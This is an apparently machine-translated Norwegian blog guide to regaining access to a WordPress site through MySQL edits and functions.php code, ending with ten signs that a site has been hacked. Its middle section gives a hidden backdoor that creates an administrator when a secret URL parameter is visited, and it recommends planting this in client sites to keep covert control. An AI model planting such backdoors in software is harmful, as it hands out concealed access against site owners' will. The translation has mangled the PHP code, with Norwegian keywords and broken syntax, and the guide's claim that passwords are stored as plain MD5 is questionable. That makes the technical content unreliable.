Hvordan hacke seg inn på et WordPress-nettsted, den komplette guiden

Hvordan hacke seg inn på et WordPress-nettsted, den komplette guiden


Vi kondolerer ikke, godkjenner eller oppfordrer til ulovlig eller ondsinnet oppførsel! Formålet med denne artikkelen er å forklare hvordan du hacker eller gjenvinner tilgang til et WordPress-nettsted som tilhører deg, eller at du har rettigheter til å redigere, administrere og få tilgang. Uansett hva du gjør, gjør du det på egen hånd. Vi er ikke ansvarlige for handlingene dine. Denne guiden fungerer kun til utdannelsesmessige formål.

Beskrevne metoder vil hjelpe deg med å gjenvinne tilgang til nettstedet selv om du ikke lenger har en konto, men vil kreve litt informasjon om nettstedet, og de vil ikke hjelpe deg å hacke inn i noen tilfeldig WordPress-installasjon.

I denne guiden skal vi vise deg:

  • Hvordan hacke seg inn på et WordPress-nettsted
  • Hvordan lage en bakdør i WordPress
  • Hvordan opprette en ny brukerkonto via FTP
  • 10 tegn på at WordPress-nettstedet ditt er hacket

Hvordan hacke seg inn på et WordPress-nettsted, den komplette guiden

Situasjoner du kan hjelpe deg i

Hvis du er i en av følgende situasjoner, vil metodene våre hjelpe deg med å gjenvinne tilgang:

  • du glemte brukernavnet eller e-postadressen
  • alternativet for tilbakestilling av passord fungerer ikke på hosting-serveren
  • tilbakestill passord e-postmeldinger kommer ikke gjennom
  • har du ikke lenger tilgang til kontoens e-postadresse
  • du vet brukernavn og passord, men kombinasjonen fungerer bare ikke

Hvis du vil bruke metodene beskrevet nedenfor, trenger du det bare ett av følgende:

  • FTP-tilgang til serveren, eller
  • cPanel-tilgang til serveren, eller
  • tilgang til MySQL-databasen og muligheten til å koble til den eksternt

Metode nr. 1 – MySQL-måten

Bruk denne metoden til å endre passord (eller brukernavn om nødvendig) til en eksisterende bruker eller for å opprette en ny konto. Du trenger cPanel-tilgang eller direkte MySQL-tilgang til nettstedets database. La oss komme i gang ved å endre passordet til en eksisterende bruker.

Hvis du bruker cPanel, kan du logge inn (cPanel kan alltid nås via https://yoursite.com:2083 lenke), finn og åpne phpMyAdmin. Listen over databaser og tabeller er til venstre. Du leter etter tabellen som ender på _users. Det vil det nok være wp_users, men hvis du har mer enn ett WordPress-nettsted installert på serveren, må du finne den rette.

Den høyre tabellen har brukeren du vil redigere i den. Følg samme prosedyre hvis du kobler til MySQL via en ekstern klient som SQLyog. Når du har funnet tabellen og den faktiske brukeroppføringen, er det på tide å endre passordet.

Som du sikkert har funnet ut av det nå, lagres passordet i user_pass felt, hashet ved hjelp av MD5-algoritmen. Åpne online MD5 generator skriv inn passordet du vil bruke, og klikk “Hash”. Kopier den genererte strengen og erstatt det opprinnelige passordet med det. I phpMyAdmin kan du redigere feltet ved å dobbeltklikke på det. Fremgangsmåten er lik i andre MySQL-klienter. Lagre endringer og logg deg på WordPress med det nye passordet ditt.

WP-brukere tabell

Brukernavn, hashede passord og e-post lagres i wp_users databasetabell

Fortsatt på metode 1 – å opprette en ny bruker

Å lage en ny bruker er litt mer komplisert, men fremdeles håndterbart på mindre enn et minutt. Lag en ny post i brukertabell og befolke: user_login, user_pass (hashed, ved hjelp av MD5-funksjonen beskrevet ovenfor) og user_email. Alle andre felt kan forbli tomme; de spiller ingen rolle. Lagre den nye posten. Når den er lagret, vil MySQL gi den en unik ID. Det er nummeret i ID-feltet. Husk det.

Gå nå til _usermeta bord. Huske, tabellets prefiks må være det samme som brukerens. For eksempel wp_users og wp_usersmeta. Hvis prefikset ikke er det samme, redigerer du feil tabell (for noen annen WP-installasjon), og den nye kontoen fungerer ikke. Vi lager to nye poster. Se bort fra umeta_id felt for dem begge. Sett bruker-ID felt til verdien du nettopp husket (den nye ID-verdien i brukertabellen). For det første platesettet meta_key til wpct_user_level og meta_value til 10. For den andre meta_key til wpct_capabilities og meta_value til a: 1: {s: 13: "administrator"; b: 1;}. Lagre begge deler. Du er ferdig – logg inn!

Metode nr. 2 – funksjoner. Php-måten

Denne tilnærmingen kan brukes enten ved å redigere features.php gjennom cPanel eller ved å bruke en FTP-klient for å gjøre det. Hvis du bruker cPanel, finn File Manager og åpne den. Først må vi finne mappen til det aktive temaet.

Gå til public_html / wp_content / temaer mappe. Hvis du umiddelbart ser temaet ditt og vet hvilket tema det er – flott. Åpne mappen og begynn å redigere functions.php. Hvis ikke, åpne nettstedet, høyreklikk hvor som helst, velg “Vis kilde”. Trykk deretter Ctrl + F og begynn å skrive / Temaer / snart vil du ha mange nettadresser uthevet, og du vil kjenne igjen mappenavnet til det aktive temaet.

Finn den i filstrukturen, åpne og begynn å redigere functions.php. Kopier / lim inn følgende kode på slutten av filen. Husk avslutningen ?> PHP-koder hvis du har dem. De må være på siste linje. Så sett inn koden foran dem.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

hvis (! brukernavn_eksister ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (matrise ('ID' => $ user_id, 'kallenavn' => $ new_user_email));

$ user = new WP_User ($ user_id);
$ Bruker-> set_role ( 'administrator');
}

Rediger bare de to første linjene i koden for å gjenspeile den nye kontoen din. Hvis det allerede er en bruker i WP med den e-posten, blir det ikke opprettet en ny konto, så sørg for at den er ny. Endre passordet også – ikke bli hacket av skriptkiddies. Når du har lagret filen, åpner du nettstedet ditt, koden blir kjørt, en ny konto med administratorrettigheter opprettet, og du kan logge deg inn med den.

Når du har gjort det, husk å slette koden fra functions.php.

Andre hackingsmetoder

Ved å kjenne FTP-, cPanel- eller MySQL-passordet, beviser du at du har legitim tilgang til serveren, og at du derfor også bør ha tilgang til WordPress-installasjonen. Hvis du ikke har noen av disse kontoene, er det ikke bra for deg (å hacke inn på andre menneskers nettsteder), og det er ikke fint!

Husk at å få uautorisert tilgang til datamaskiner, nettsteder eller servere er en alvorlig forbrytelse og blir omgående håndtert i de fleste land.

Hvis du er redd for at WordPress-nettstedet ditt kan bli hacket, kan du sjekke denne siden med gratis WordPress-sikkerhetsskanner. Hvis du ikke har tid til å sette opp bloggen din, la oss gjøre det for deg.

Hvordan lage en bakdør i WordPress

Når inngangsdøren er lukket, kan du prøve bakdøren. Dette kan høres ut som en ondsinnet måte å bruke koden for å komme inn på siden uten å ha tilgang til den, men det er faktisk tider når du trenger å kontrollere ditt eget nettsted hvis noen stjal det.

Hvis det er å lage nettsteder for andre mennesker noe du gjør, vil det før eller senere være en klient som vil nekte å betale deg for arbeidet ditt; en klient som vil slette innloggingsinformasjonen din og overta kontrollen over alt du har gjort. Noen ganger vil det være nok å opprette en ny bruker via FTP eller å tilbakestille et passord. Når det ikke er nok, kan det være lurt å hacke seg tilbake eller opprette en tilgang til bakdøren til admin-sidene.

Men hvis du bestemte deg for å skjule et lite stykke kode i WordPress-miljøet ditt, kan du kanskje spare deg noe verdighet og få tilgang til WordPress-nettstedet med administratorrettigheter. Og det er der spillene begynner.

Uansett hvor mange ganger denne tyven sletter informasjonen din eller gjenoppretter en sikkerhetskopi på en server han sannsynligvis eier, er det en sjanse for at han ikke vet noe om innganger på bakdøren. Hvis han gjorde det, ville han sannsynligvis ikke engang trenge hjelpen din med å sette opp WordPress, ikke sant?

Lag en bakdør:

OK, nok med praten; her er et stykke kode du trenger for å få jobben gjort:

  1. Åpne features.php-filen
  2. Kopier / lim inn følgende kode:
  3. add_action ('wp_head', 'wploop_backdoor');
    funksjon wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    kreve ( 'wp-includes / registration.php');
    Hvis (! Brukernavn_eksister ('brukernavn')) {
    $ user_id = wp_create_user ('navn', 'pass');
    $ user = new WP_User ($ user_id);
    $ Bruker-> set_role ( 'administrator');
    }
    }
    }
    ?>
  4. Lagre endringer

Hvis du lar koden være som den er, er alt du trenger å gjøre for å opprette en ny administrator på nettstedet, besøke http://www.yourdomain.com/?backdoor=knockknock

Etter at siden ble lastet inn, er det nye brukernavnet ditt “Navn” og passord “sende”.

Selvfølgelig, Du kan endre det i koden ovenfor ved å endre ‘navn’ og ‘pass’ til hva du vil. Du kan også endre lenken til bakdøren din ved å endre ‘bakdør’ og / eller ‘knockknock’ til alt du kommer opp med.

Prøv funksjonen – ikke bare den er morsom, men den kan virkelig hjelpe deg en gang i fremtiden når du skal lage et nettsted for noen du ikke kan stole helt på. Du bør også nivåere WordPress og bloggferdighetene dine.

Hvordan opprette en ny brukerkonto via FTP

Det er veldig enkelt å opprette nye brukerkontoer på WordPress. Som administrator må du gjøre det naviger til Administratorside for brukere der du kan opprette en ny konto for hvilken som helst brukerrolle. Dette kan gjøres i løpet av sekunder, og en nyopprettet bruker kan umiddelbart logge inn med gitt brukernavn og passord.

Men hva skjer hvis du mister tilgangen til WordPress-administratoren din? Ting kan bli litt mer komplisert, men ikke bekymre deg – vi har en funksjon for deg som kan redde adminens liv.

Enten en annen administrator slettet kontoen din, om du har slettet alle brukere fra databasen ved en feiltakelse, brukt en feilaktig plugin eller blitt hacket, kan du fortsatt komme tilbake i kontrollen. Noen ganger kan det hende at du bare kan få tilgang til FTP-serveren mens HTTP-enheten er utenfor rekkevidde, og du må opprette en ny administrator. Selv om det kan være et sjeldent tilfelle, vil følgende funksjon redde deg.

For å opprette en ny konto utenfor WordPress administrasjonsmiljø, alt du trenger er en FTP-tilgang til nettstedet ditt. Som administrator bør du ha all nødvendig informasjon for å logge på serveren din, og du kan raskt opprette en ny konto ved å opprette en ny funksjon i temaet ditt.

Opprett en ny brukerkonto via FTP:

  1. Åpne FTP-klient og koble til kontoen din
  2. Naviger til wp-innhold / temaer
  3. Åpne mappen for temaet du bruker
  4. Søk etter features.php-fil og rediger den
  5. Kopier og lim inn følgende funksjon:
  6. funksjon admin_account () {
    $ user = 'Brukernavn';
    $ pass = 'Passord';
    $ email = '[email protected]';
    hvis (! brukernavn_eksister ($ bruker) &&! e-post_eksister ($ e-post)) {
    $ user_id = wp_create_user ($ bruker, $ pass, $ e-post);
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }}
    ADD_ACTION ( 'init', 'admin_account');
    
  7. Endre brukernavn, passord og e-post til noe unikt
  8. Lagre endringer

Forsikre deg om at brukernavn, passord og e-postadresse som du angir i funksjonen er unikt ellers fungerer ikke funksjonen ordentlig. Når du har lagret endringene, er du ferdig, og du kan navigere til WP-påloggingspanelet. Bruk ny informasjon for å logge deg på igjen og når du har bekreftet kontoen, kan du slette funksjonen fra filen funksjoner.php.

Funksjonen vist ovenfor oppretter en admin-konto, men du kan enkelt endre den for å opprette en konto med en hvilken som helst annen brukerrolle. Ganske enkelt endre rolle på 8th rad av koden til redaktøren, forfatteren, bidragsyteren, abonnenten eller annen brukerrolle du har opprettet.

Dessverre, hvis du har mistet admin-kontoen din, har du også mistet alle innleggene som er skrevet under det brukernavnet. Derfor bør du alltid ha en sikkerhetskopi som du enkelt kan hente. Hvis du leser dette mens du har administrasjonskontoen din, ta dette som en påminnelse om å lage en sikkerhetskopi umiddelbart og bokmerke denne artikkelen i tilfelle du trenger å opprette en konto utenfor WordPress i fremtiden.

10 tegn på at WordPress-nettstedet ditt er hacket

WordPress er en enorm bloggplattform. Det er millioner av brukere, og det ser ut til at antallet raskt vokser hver dag. Folk pleier til og med å overføre nettsteder som er opprettet i andre innholdsstyringssystemer til dette open source-systemet oftere enn du kanskje tror. Og selv om dette er bra, betyr det det hackere vil også sette WordPress på et sted når de prøver å invadere tilfeldige nettsteder.

Vanligvis, hvis du blir hacket, vil du vite om det umiddelbart. Nettstedet ditt vil bli utilgjengelig; kan du ikke logge inn, og noen ganger vil en hacker til og med legge igjen en melding på forsiden. Men oftere enn ikke, kanskje du ikke engang legger merke til at noe har endret seg. I denne delen av artikkelen skal vi vise deg flere tegn som kan vise deg at WordPress-nettstedet ditt ble hacket og noen få løsninger på problemet.

1. Mislykket pålogging

Dette tegnet er ganske tydelig. Hvis du har brukt et brukernavn og passordkombinasjon på en stund uten noen gang å ha problemer, kan du bli mistenksom hvis WordPress plutselig ikke gjenkjenner kontoen din. Hvis en hacker måtte logge inn på nettstedet ditt, er sjansen stor for at han raskt vil endre administratorrettighetene dine.

Kanskje han måtte endre passordet ditt eller slette kontoen din fullstendig. Før du begynner å få panikk etter første gang WordPress melder deg om feil brukernavn / passord, må du tenke på det faktum at du kanskje har skrevet inn en feil kombinasjon, eller at du kan ha slått på caps lock-knappen.

Løsning: Prøv å gjenopprette passordet via e-post eller bruk en annen konto for å logge deg på igjen. For å sikre at du logger inn forblir trygt, anbefaler vi å installere Pålogging Ninja plugin for WordPress.

2. Skadelig innhold legges til nettstedet ditt

Nettstedet inneholder en advarsel om skadelig programvare

Hvis du begynner å legge merke til ukjent innhold på nettstedet ditt, kan du begynne å bekymre deg. Når de får en sjanse til å få tilgang til adminområdet ditt, hackere vil kunne endre kjernen din og både tema- og plugin-filer. Det betyr at de får endre alt de vil.

Mens noen hackere vil endre utseendet på nettstedet ditt drastisk og kanskje til og med uttale at du ble hacket, vil de andre være mye mer subtile om det.

Løsning: Prøv å lete etter skjult innhold i nettstedskoden. Det kan være lenker til ondsinnede nettsteder hackere plantet i bunnteksten på nettstedet ditt, eller de kan ha installert popup-vinduer som vil åpne regelmessig for kundene dine. Bruk Security Ninja til å skanne nettstedet ditt eller kontinuerlig overvåke nettstedet ditt for slike problemer.

3. Mistenkelige besøk

Hvis du ikke sporer nettstedet ditt, bør du begynne å gjøre det umiddelbart. En enkel måte å gjøre er å bruke Google Analytics som blant mange andre funksjoner kan fortelle deg hvor mange besøk du får og hvor kommer de besøkene. Etter litt tid vil du bli kjent med nettstedet ditt. Det betyr at du vil vite hvor kommer besøkene fra, du vil vite når du lanserer en ny kampanje og når det er nye kampanjekoblinger utgitt i naturen.

Men hvis du plutselig legger merke til at nettstedet ditt får et enormt antall nye besøk fra det mistenkelige domenet, vil du undersøke dette nærmere fordi nettstedet ditt kanskje bare blir hacket. Vanligvis vil den typen besøk resultere i en avvisningsrate på 100%, noe som betyr at bare en side ble åpnet. Hackere vil ofte bruke automatiserte systemer som vil føre andre dårlige nettsteder til dine. Enten det er den dårlige koden som blir kjørt på nettstedet ditt eller om du har blitt en del av et søppelpostnettverk, kan ting bli alvorlig, og du må sjekke nettstedet ditt for ondsinnet kode.

Løsning: Bruk Googles verktøy for webansvarlige å finne mistenkelige domener

4. Et plutselig fall i trafikken

Sikker surfing på nettstedets status

I motsetning til sist nevnte tegn på å bli hacket, kan denne kanskje varsle deg fordi det plutselig er et fall i antall besøk. I stedet for å henvise til nye besøk til deg, en hacker kan sende besøk fra nettstedet ditt. Dette kan skje fordi en hacker omdirigerte nettstedet ditt til et annet. Den andre grunnen for å få færre besøkende er at Google svartelistet nettstedet ditt. Denne handlingen viser en melding til alle brukere som kan velge å ikke åpne nettstedet ditt fordi det er infisert.

Løsning: Bruk Googles Safe Browsing Site Status for å sjekke om nettstedet ditt er merket som utrygt og for øyeblikket er farlig å besøke.

5. Resultatene av søkemotoren er rart

Hvis du ikke har lagt merke til endringer på nettstedet ditt, men du finner ut at søkeresultatene i Google og andre søkemotorer er rart (vis forskjellige titler og andre metadata), kan dette være et tydelig tegn på et hacket nettsted. En hacker kan ha endret innholdet ditt på en måte som bare kan være synlig for en ekspert. Forandringen vil fremdeles være synlig i resultatene fra søkemotoren.

Løsning: Sjekk nettstedet ditt med Googles verktøy for webansvarlige, og sjekk om nettstedet ditt ble hacket med dette gratis online verktøy.

6. Du kan ikke sende / motta e-post

Når en hacker får tilgang til nettstedet ditt, vil han sannsynligvis ønske det bruk serveren din for å spam alle andre. Når du finner ut at du ikke kan sende eller motta nye e-poster fra WordPress, kan dette være et tydelig tegn på at du ble hacket. Sjekk e-posten din igjen, og sjekk den deretter med leverandøren din for å forsikre deg om at det ikke er noen feil.

Løsning: Test WordPress postfunksjon med denne gratis plugin.

7. Nettstedet eksisterer ikke

Server ikke funnet

Det er tider hvor hackere ikke får tilgang til nettstedet ditt for å plante ondsinnet kode, omdirigere brukere eller bruke e-posten din til spam. Noen ganger, alt de vil gjøre er å krasje nettstedet ditt. En sjelden gang vil en hacker slette alt fra hele serveren. Det er derfor det er viktig at du er vert for filene dine hos et kjent vertsfirma som vil ta sikkerhet og også beholde daglige eller minst ukentlige sikkerhetskopier av nettstedet ditt. Det er en god praksis at du også gjør dine egne sikkerhetskopier fra tid til annen, slik at nettstedet raskt kan gjenopprettes.

Løsning: Installer en av de beste programtilleggene for sikkerhetskopihåndtering i WordPress.

8. Mistenkelige filer

Ligner på skadelig innhold som kan legges til eksisterende filer, en hacker vil kanskje plante ekstra filer hvor som helst i rotmappen din. Det er en god ting å vite veien rundt WordPress, men hvis du ikke er så erfaren, bør du ha et sikkerhetsverktøy til rådighet som kan sjekke alle filene og aktivitetene dine. Nylig har vi gjennomgått Security Ninja, som er et perfekt verktøy for å sjekke alle WordPress-filene dine.

Løsning: Prøv å lete etter filer som ikke tilhører WordPress-installasjonen. Bruk Security Ninja til å skanne nettstedet ditt regelmessig og finne disse filene automatisk. Slett deretter filene eller fjern den ondsinnede koden fra infiserte filer. Ikke glem Core Scanner-tillegget for Security Ninja.

9. Nye medlemmer

Avhengig av nettstedet ditt, er du kanskje den eneste som kan legge til nye medlemmer. I så fall kan en e-postmelding som forteller deg om nyregistrerte brukere utløse en alarm. Hvis det er andre administratorer som har muligheten til å legge til nye medlemmer, kan du ta kontakt med dem om mistenkelig aktivitet.

Løsning: Endre påloggingsadresse med en gratis plugin, begrense tilgangen til din WordPress påloggingsside ved å bruke .htpasswd-filen og bruk Login Ninja for å beskytte påloggingsskjemaet hele tiden.

10. Sjekk ut planlagte hendelser på serveren din

Noen ganger vil ikke en hacker gjøre noe med nettstedet ditt når de finner veien. I stedet, de vil forlate planlagte arrangementer som kan skade nettstedet ditt en gang i fremtiden. Denne teknikken er farlig fordi en hacker kan etterlate uerfarne offer uten mening med det første. Du kan være smittet og vet ingenting om det.

Løsning: Sjekk CRON-jobbene dine på en server du bruker, og sørg for at det ikke er mistenkelige planlagte oppgaver.

Innpakking

Vi håper at denne artikkelen vil hjelpe deg med å administrere enda et tryggere WordPress-nettsted, og at den vil hjelpe deg å gjenvinne tilgang til den i dårlige situasjoner. Og selv om nettstedet ditt er rent, ikke ta det for gitt.
Forsikre deg alltid om at bloggen din er så trygg som den kan være. Vi foreslår sikkerhetsprogramtillegg for WordPress som kan spare deg for de fleste ganger. Fortsett, ikke vær den som bruker utrygt passord, og vær forsiktig når du hacker til ditt eget WordPress-nettsted.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map